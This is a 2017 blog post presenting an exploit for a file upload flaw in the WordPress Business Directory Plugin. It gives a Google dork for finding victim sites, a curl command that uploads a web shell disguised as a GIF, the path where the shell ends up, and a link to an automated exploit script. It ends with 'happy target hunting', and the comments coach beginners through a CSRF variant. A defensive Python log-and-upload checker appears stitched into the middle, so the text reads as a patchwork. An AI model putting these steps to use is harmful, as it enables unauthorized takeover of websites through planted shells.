Saturday, 3 June 2017

WordPress Business Directory Plugin File Upload


Exploit Title: WordPress Business Directory Plugin File Upload
Author: Jingklong ( Bahari Trouble Maker )



Google Dork: inurl:/wp-content/ inurl:/business-directory-plugin
Vuln Path: /wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

Example Target:
http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

( Vuln Target )
Exploit:
1. CSRF


2. CURL POST
root # curl -v -k -F "file=@shell.gif" "http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload"

Upload your file in .gif/.jpg/.png format.

Your uploaded file can then be found at:
http://target.com/wp-content/uploads/2017/06/shell.gif
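As an added defender-side example, not part of the original post: a Python script that flags POST requests to the wpbdp-file-field-upload admin-ajax action in combined-format access logs, and audits files under wp-content/uploads/ whose bytes do not match their .gif/.jpg/.png extension. The log lines and file contents are constructed; the polyglot check (valid image magic followed by a PHP tag) goes beyond the post, since magic bytes alone are not proof of a harmless image.

```python
import os
import re
from urllib.parse import parse_qs, urlparse

VULN_ACTION = "wpbdp-file-field-upload"  # admin-ajax action named in the post

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Constructed sample log lines; not taken from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Jun/2017:10:01:12 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 41 "-" "Mozilla/5.0"
203.0.113.9 - - [03/Jun/2017:10:02:44 +0000] "POST /wp-admin/admin-ajax.php?action=wpbdp-file-field-upload HTTP/1.1" 200 87 "-" "curl/7.52.1"
203.0.113.9 - - [03/Jun/2017:10:02:51 +0000] "GET /wp-content/uploads/2017/06/shell.gif HTTP/1.1" 200 1512 "-" "curl/7.52.1"
198.51.100.2 - - [03/Jun/2017:10:03:10 +0000] "GET /wp-content/uploads/2017/06/logo.png HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

def find_upload_requests(log_text):
    """POSTs to admin-ajax.php whose action= parameter is the vulnerable upload handler."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        action = parse_qs(urlparse(m["path"]).query).get("action", [])
        if m["method"] == "POST" and action == [VULN_ACTION]:
            hits.append({"ip": m["ip"], "ua": m["ua"], "status": m["status"]})
    return hits

# Leading bytes a genuine file of each extension must start with.
MAGIC = {".gif": (b"GIF87a", b"GIF89a"), ".png": (b"\x89PNG\r\n\x1a\n",),
         ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",)}

def suspicious_uploads(files):
    """Flag files whose bytes do not match their image extension, plus polyglots with a PHP tag."""
    flagged = []
    for name, data in files.items():
        sigs = MAGIC.get(os.path.splitext(name)[1].lower(), ())
        if not any(data.startswith(s) for s in sigs) or b"<?php" in data:
            flagged.append(name)
    return sorted(flagged)

# Constructed contents standing in for files under wp-content/uploads/.
SAMPLE_UPLOADS = {
    "2017/06/logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    "2017/06/photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 8,
    "2017/06/shell.gif": b"<?php /* constructed: script text behind a .gif name */ ?>",
    "2017/06/banner.gif": b"GIF89a" + b"<?php /* constructed polyglot */ ?>",
}
```

Run `find_upload_requests` over your real access log and `suspicious_uploads` over the uploads directory contents; one hit from the same client followed by a GET of a fresh file in wp-content/uploads/ is the pattern to alert on.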


Download:
Auto Exploit (BASH): https://pastebin.com/Wk904pU9


OK, happy target hunting :D

8 comments:

  1. Bro Agus, does this have to be done on Linux? What if I'm not on Linux, bro?

    1. It works without Linux too, use the CSRF method.

  2. Bro, where does the CSRF come from? Sorry, newbie.

    1. There's a screenshot of the script there, bro, just retype it :v

    2. Save it with the .html extension/format.
      Just put it on your local disk, then open the file.

      Change the target="http://targetlu.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload" part to your own target.

  3. Bro, please teach me how to get a root terminal on my device like that.
